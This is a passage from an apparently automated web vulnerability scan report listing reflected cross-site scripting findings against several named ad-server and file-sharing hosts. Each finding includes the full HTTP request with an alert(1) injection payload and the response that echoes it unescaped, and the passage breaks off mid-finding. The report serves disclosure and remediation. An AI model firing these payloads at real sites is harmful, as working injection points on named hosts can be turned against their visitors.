'/adserver/';InsightExpress.DomainName='core.insightexpressai.com';InsightExpress.QueryString='esi=true&bannerID=178074&referer=fashion.glam.com&adexpansion=0&siteID=glamcom&placementID=1248525&click=012b9b'-alert(1)-'f3000b47a8f&creativeID=1467968'; InsightExpress.onload=function(){InsightExpress.Loaded=true;if(!InsightExpress.Cookies.Enabled()) return;var invite=new InsightExpress.PopUpInvite({"Disallow":{"SafeGuard":false,"
...[SNIP]...

3.129. http://core.insightexpressai.com/adServer/GetInvite2.aspx [creativeID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://core.insightexpressai.com
Path:   /adServer/GetInvite2.aspx

Issue detail

The value of the creativeID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e6c1'-alert(1)-'5041316b77e was submitted in the creativeID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adServer/GetInvite2.aspx?esi=true&bannerID=178074&referer=fashion.glam.com&adexpansion=0&siteID=glamcom&placementID=1248525&click=0&creativeID=14679689e6c1'-alert(1)-'5041316b77e HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://fashion.glam.com/2011/04/18/my-spring-shopping-decisions/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=32d59d941303349174; IXAIBannerCounter178074=1; IXAIFirstHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAILastHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAICampaignCounter2648=1; IXAIBanners2648=178074

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Content-Length: 19918
Date: Thu, 21 Apr 2011 01:57:33 GMT
Connection: close
Cache-Control: no-store

var InsightExpress={};InsightExpress.LogText='';InsightExpress.Log=function(s,s2){if(!InsightExpress.LogText)InsightExpress.LogText='';InsightExpress.LogText+=s+(s2?' = '+s2:'')+'\n'};InsightExpress.D
...[SNIP]...
tExpress.DomainName='core.insightexpressai.com';InsightExpress.QueryString='esi=true&bannerID=178074&referer=fashion.glam.com&adexpansion=0&siteID=glamcom&placementID=1248525&click=0&creativeID=14679689e6c1'-alert(1)-'5041316b77e'; InsightExpress.onload=function(){InsightExpress.Loaded=true;if(!InsightExpress.Cookies.Enabled()) return;var invite=new InsightExpress.PopUpInvite({"Disallow":{"SafeGuard":false,"REMO":false},"Type"
...[SNIP]...

3.130. http://core.insightexpressai.com/adServer/GetInvite2.aspx [esi parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://core.insightexpressai.com
Path:   /adServer/GetInvite2.aspx

Issue detail

The value of the esi request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fdda0'-alert(1)-'db54780fa93 was submitted in the esi parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adServer/GetInvite2.aspx?esi=truefdda0'-alert(1)-'db54780fa93&bannerID=178074&referer=fashion.glam.com&adexpansion=0&siteID=glamcom&placementID=1248525&click=0&creativeID=1467968 HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://fashion.glam.com/2011/04/18/my-spring-shopping-decisions/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=32d59d941303349174; IXAIBannerCounter178074=1; IXAIFirstHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAILastHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAICampaignCounter2648=1; IXAIBanners2648=178074

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Content-Length: 19918
Date: Thu, 21 Apr 2011 01:57:09 GMT
Connection: close
Cache-Control: no-store

var InsightExpress={};InsightExpress.LogText='';InsightExpress.Log=function(s,s2){if(!InsightExpress.LogText)InsightExpress.LogText='';InsightExpress.LogText+=s+(s2?' = '+s2:'')+'\n'};InsightExpress.D
...[SNIP]...
cs.AddParam('timeinview',InsightExpress.Analytics.TotalTimeInView);},1000)}});InsightExpress.Path='/adserver/';InsightExpress.DomainName='core.insightexpressai.com';InsightExpress.QueryString='esi=truefdda0'-alert(1)-'db54780fa93&bannerID=178074&referer=fashion.glam.com&adexpansion=0&siteID=glamcom&placementID=1248525&click=0&creativeID=1467968'; InsightExpress.onload=function(){InsightExpress.Loaded=true;if(!InsightExpress.Co
...[SNIP]...

3.131. http://core.insightexpressai.com/adServer/GetInvite2.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://core.insightexpressai.com
Path:   /adServer/GetInvite2.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bdcad'-alert(1)-'45ed1dc4170 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adServer/GetInvite2.aspx?esi=true&bannerID=178074&referer=fashion.glam.com&adexpansion=0&siteID=glamcom&placementID=1248525&click=0&creativeID=1467968&bdcad'-alert(1)-'45ed1dc4170=1 HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://fashion.glam.com/2011/04/18/my-spring-shopping-decisions/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=32d59d941303349174; IXAIBannerCounter178074=1; IXAIFirstHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAILastHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAICampaignCounter2648=1; IXAIBanners2648=178074

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Content-Length: 19931
Date: Thu, 21 Apr 2011 01:57:38 GMT
Connection: close
Cache-Control: no-store

var InsightExpress={};InsightExpress.LogText='';InsightExpress.Log=function(s,s2){if(!InsightExpress.LogText)InsightExpress.LogText='';InsightExpress.LogText+=s+(s2?' = '+s2:'')+'\n'};InsightExpress.D
...[SNIP]...
Express.DomainName='core.insightexpressai.com';InsightExpress.QueryString='esi=true&bannerID=178074&referer=fashion.glam.com&adexpansion=0&siteID=glamcom&placementID=1248525&click=0&creativeID=1467968&bdcad'-alert(1)-'45ed1dc4170=1'; InsightExpress.onload=function(){InsightExpress.Loaded=true;if(!InsightExpress.Cookies.Enabled()) return;var invite=new InsightExpress.PopUpInvite({"Disallow":{"SafeGuard":false,"REMO":false},"Typ
...[SNIP]...

3.132. http://core.insightexpressai.com/adServer/GetInvite2.aspx [placementID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://core.insightexpressai.com
Path:   /adServer/GetInvite2.aspx

Issue detail

The value of the placementID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c1f0b'-alert(1)-'e0b38926cbb was submitted in the placementID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adServer/GetInvite2.aspx?esi=true&bannerID=178074&referer=fashion.glam.com&adexpansion=0&siteID=glamcom&placementID=1248525c1f0b'-alert(1)-'e0b38926cbb&click=0&creativeID=1467968 HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://fashion.glam.com/2011/04/18/my-spring-shopping-decisions/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=32d59d941303349174; IXAIBannerCounter178074=1; IXAIFirstHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAILastHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAICampaignCounter2648=1; IXAIBanners2648=178074

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Content-Length: 19918
Date: Thu, 21 Apr 2011 01:57:26 GMT
Connection: close
Cache-Control: no-store

var InsightExpress={};InsightExpress.LogText='';InsightExpress.Log=function(s,s2){if(!InsightExpress.LogText)InsightExpress.LogText='';InsightExpress.LogText+=s+(s2?' = '+s2:'')+'\n'};InsightExpress.D
...[SNIP]...
ss.Path='/adserver/';InsightExpress.DomainName='core.insightexpressai.com';InsightExpress.QueryString='esi=true&bannerID=178074&referer=fashion.glam.com&adexpansion=0&siteID=glamcom&placementID=1248525c1f0b'-alert(1)-'e0b38926cbb&click=0&creativeID=1467968'; InsightExpress.onload=function(){InsightExpress.Loaded=true;if(!InsightExpress.Cookies.Enabled()) return;var invite=new InsightExpress.PopUpInvite({"Disallow":{"SafeGuard"
...[SNIP]...

3.133. http://core.insightexpressai.com/adServer/GetInvite2.aspx [referer parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://core.insightexpressai.com
Path:   /adServer/GetInvite2.aspx

Issue detail

The value of the referer request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f5c18'-alert(1)-'24d5fcbf7c9 was submitted in the referer parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adServer/GetInvite2.aspx?esi=true&bannerID=178074&referer=fashion.glam.comf5c18'-alert(1)-'24d5fcbf7c9&adexpansion=0&siteID=glamcom&placementID=1248525&click=0&creativeID=1467968 HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://fashion.glam.com/2011/04/18/my-spring-shopping-decisions/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=32d59d941303349174; IXAIBannerCounter178074=1; IXAIFirstHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAILastHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAICampaignCounter2648=1; IXAIBanners2648=178074

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Content-Length: 19946
Date: Thu, 21 Apr 2011 01:57:15 GMT
Connection: close
Cache-Control: no-store

var InsightExpress={};InsightExpress.LogText='';InsightExpress.Log=function(s,s2){if(!InsightExpress.LogText)InsightExpress.LogText='';InsightExpress.LogText+=s+(s2?' = '+s2:'')+'\n'};InsightExpress.D
...[SNIP]...
nalytics.TotalTimeInView);},1000)}});InsightExpress.Path='/adserver/';InsightExpress.DomainName='core.insightexpressai.com';InsightExpress.QueryString='esi=true&bannerID=178074&referer=fashion.glam.comf5c18'-alert(1)-'24d5fcbf7c9&adexpansion=0&siteID=glamcom&placementID=1248525&click=0&creativeID=1467968'; InsightExpress.onload=function(){InsightExpress.Loaded=true;if(!InsightExpress.Cookies.Enabled()) return;var invite=new In
...[SNIP]...

3.134. http://core.insightexpressai.com/adServer/GetInvite2.aspx [siteID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://core.insightexpressai.com
Path:   /adServer/GetInvite2.aspx

Issue detail

The value of the siteID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f43b9'-alert(1)-'33e1490a324 was submitted in the siteID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adServer/GetInvite2.aspx?esi=true&bannerID=178074&referer=fashion.glam.com&adexpansion=0&siteID=glamcomf43b9'-alert(1)-'33e1490a324&placementID=1248525&click=0&creativeID=1467968 HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://fashion.glam.com/2011/04/18/my-spring-shopping-decisions/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=32d59d941303349174; IXAIBannerCounter178074=1; IXAIFirstHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAILastHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAICampaignCounter2648=1; IXAIBanners2648=178074

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Content-Length: 19918
Date: Thu, 21 Apr 2011 01:57:22 GMT
Connection: close
Cache-Control: no-store

var InsightExpress={};InsightExpress.LogText='';InsightExpress.Log=function(s,s2){if(!InsightExpress.LogText)InsightExpress.LogText='';InsightExpress.LogText+=s+(s2?' = '+s2:'')+'\n'};InsightExpress.D
...[SNIP]...
000)}});InsightExpress.Path='/adserver/';InsightExpress.DomainName='core.insightexpressai.com';InsightExpress.QueryString='esi=true&bannerID=178074&referer=fashion.glam.com&adexpansion=0&siteID=glamcomf43b9'-alert(1)-'33e1490a324&placementID=1248525&click=0&creativeID=1467968'; InsightExpress.onload=function(){InsightExpress.Loaded=true;if(!InsightExpress.Cookies.Enabled()) return;var invite=new InsightExpress.PopUpInvite({"Di
...[SNIP]...

3.135. http://core.insightexpressai.com/adServer/adServerESI.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://core.insightexpressai.com
Path:   /adServer/adServerESI.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12c6f"-alert(1)-"d6a3c5a4495 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adServer/adServerESI.aspx?bannerID=177784&siteID=glamcom&creativeID=1467968&placementID=1248525&adexpansion=0&click=0&12c6f"-alert(1)-"d6a3c5a4495=1 HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://fashion.glam.com/2011/04/18/my-spring-shopping-decisions/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Length: 634
Content-Type: text/javascript; charset=utf-8
Set-Cookie: IXAIBanners2648=178074,178074; domain=.insightexpressai.com; expires=Wed, 20-Apr-2016 12:00:00 GMT; path=/
Set-Cookie: IXAIBannerCounter178074=2; domain=.insightexpressai.com; expires=Wed, 20-Apr-2016 12:00:00 GMT; path=/
Set-Cookie: IXAILastHit2648=4%2f20%2f2011+9%3a42%3a49+PM; domain=.insightexpressai.com; expires=Wed, 20-Apr-2016 12:00:00 GMT; path=/
Set-Cookie: IXAICampaignCounter2648=2; domain=.insightexpressai.com; expires=Wed, 20-Apr-2016 12:00:00 GMT; path=/
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Vary: Accept-Encoding
Expires: Thu, 21 Apr 2011 01:57:30 GMT
Pragma: no-cache
Date: Thu, 21 Apr 2011 01:57:30 GMT
Connection: close
Cache-Control: no-store


function IX_InviteAllowed(){var f=typeof(window.sitePerformedInvite)!='function' || !window.sitePerformedInvite();return f;}
function IX_InvitePerformed(){if (typeof(window.siteInvited)=='fun
...[SNIP]...
IX_InvitePerformed();var s = document.createElement('script');s.language='javascript';s.src="http://core.insightexpressai.com/adServer/GetInvite2.aspx?esi=true&bannerID=178074&referer=fashion.glam.com&12c6f"-alert(1)-"d6a3c5a4495=1&adexpansion=0&siteID=glamcom&placementID=1248525&click=0&creativeID=1467968";document.getElementsByTagName('head')[0].appendChild(s);}})();

3.136. http://d.chango.com/collector/admeldpixel [admeld_adprovider_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.chango.com
Path:   /collector/admeldpixel

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b3c4'%3balert(1)//80bce15156d was submitted in the admeld_adprovider_id parameter. This input was echoed as 4b3c4';alert(1)//80bce15156d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /collector/admeldpixel?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=3334b3c4'%3balert(1)//80bce15156d&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: d.chango.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/imp/iframe/100/glammedia/160x600/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb9/ce486e34-952b-40f2-86f9-06615005178d?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349053
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _t=0c2aede6-6bb6-11e0-8fe6-0025900a8ffe; _i_cw=1

Response

HTTP/1.1 200 OK
Content-Length: 155
Server: Chango RTB Server
Etag: "35a6a52235cb36ef51ca06ff2564423a92664585"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/javascript
Set-Cookie: _t=0c2aede6-6bb6-11e0-8fe6-0025900a8ffe; Domain=chango.com; expires=Sun, 18 Apr 2021 01:29:35 GMT; Path=/
Set-Cookie: _i_admeld=1; Domain=chango.com; expires=Sun, 05 Jun 2011 01:29:35 GMT; Path=/
Connection: close

(new Image()).src='http://tag.admeld.com/match?admeld_adprovider_id=3334b3c4';alert(1)//80bce15156d&external_user_id=0c2aede6-6bb6-11e0-8fe6-0025900a8ffe';

3.137. http://d.chango.com/collector/admeldpixel [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.chango.com
Path:   /collector/admeldpixel

Issue detail

The value of the admeld_callback request parameter is copied into the HTML document as plain text between tags. The payload 8f191<script>alert(1)</script>b1bf9d074e0 was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /collector/admeldpixel?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=333&admeld_call_type=js&admeld_callback=8f191<script>alert(1)</script>b1bf9d074e0 HTTP/1.1
Host: d.chango.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/imp/iframe/100/glammedia/160x600/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb9/ce486e34-952b-40f2-86f9-06615005178d?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349053
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _t=0c2aede6-6bb6-11e0-8fe6-0025900a8ffe; _i_cw=1

Response

HTTP/1.1 200 OK
Content-Length: 141
Server: Chango RTB Server
Etag: "92ae39ffdbe8186715f3ce9a39b5b7c61d16400a"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/javascript
Set-Cookie: _t=0c2aede6-6bb6-11e0-8fe6-0025900a8ffe; Domain=chango.com; expires=Sun, 18 Apr 2021 01:29:35 GMT; Path=/
Set-Cookie: _i_admeld=1; Domain=chango.com; expires=Sun, 05 Jun 2011 01:29:35 GMT; Path=/
Connection: close

(new Image()).src='8f191<script>alert(1)</script>b1bf9d074e0?admeld_adprovider_id=333&external_user_id=0c2aede6-6bb6-11e0-8fe6-0025900a8ffe';

3.138. http://d.chango.com/collector/admeldpixel [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.chango.com
Path:   /collector/admeldpixel

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f5da'%3balert(1)//729a3bd1e19 was submitted in the admeld_callback parameter. This input was echoed as 2f5da';alert(1)//729a3bd1e19 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /collector/admeldpixel?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=333&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match2f5da'%3balert(1)//729a3bd1e19 HTTP/1.1
Host: d.chango.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/imp/iframe/100/glammedia/160x600/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb9/ce486e34-952b-40f2-86f9-06615005178d?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349053
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _t=0c2aede6-6bb6-11e0-8fe6-0025900a8ffe; _i_cw=1

Response

HTTP/1.1 200 OK
Content-Length: 155
Server: Chango RTB Server
Etag: "5461dfc48519a6013147870fa767d12e5ce5b739"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/javascript
Set-Cookie: _t=0c2aede6-6bb6-11e0-8fe6-0025900a8ffe; Domain=chango.com; expires=Sun, 18 Apr 2021 01:29:35 GMT; Path=/
Set-Cookie: _i_admeld=1; Domain=chango.com; expires=Sun, 05 Jun 2011 01:29:35 GMT; Path=/
Connection: close

(new Image()).src='http://tag.admeld.com/match2f5da';alert(1)//729a3bd1e19?admeld_adprovider_id=333&external_user_id=0c2aede6-6bb6-11e0-8fe6-0025900a8ffe';

3.139. http://dc305.4shared.com/main/upload.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dc305.4shared.com
Path:   /main/upload.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b49ee"-alert(1)-"5c431f0ee83 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mainb49ee"-alert(1)-"5c431f0ee83/upload.jsp HTTP/1.1
Host: dc305.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 /mainb49ee&quot;-alert(1)-&quot;5c431f0ee83/upload.jsp
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Thu, 24 Feb 2011 19:45:53 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://dc305.4shared.com/mainb49ee"-alert(1)-"5c431f0ee83/upload.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

3.140. http://dc305.4shared.com/main/upload.jsp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dc305.4shared.com
Path:   /main/upload.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a85e5"-alert(1)-"9824e0eb5f7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /main/upload.jspa85e5"-alert(1)-"9824e0eb5f7 HTTP/1.1
Host: dc305.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 /main/upload.jspa85e5&quot;-alert(1)-&quot;9824e0eb5f7
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Thu, 24 Feb 2011 19:46:01 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://dc305.4shared.com/main/upload.jspa85e5"-alert(1)-"9824e0eb5f7";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.141. http://dc308.4shared.com/main/upload.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dc308.4shared.com
Path:   /main/upload.jsp

Issue detail

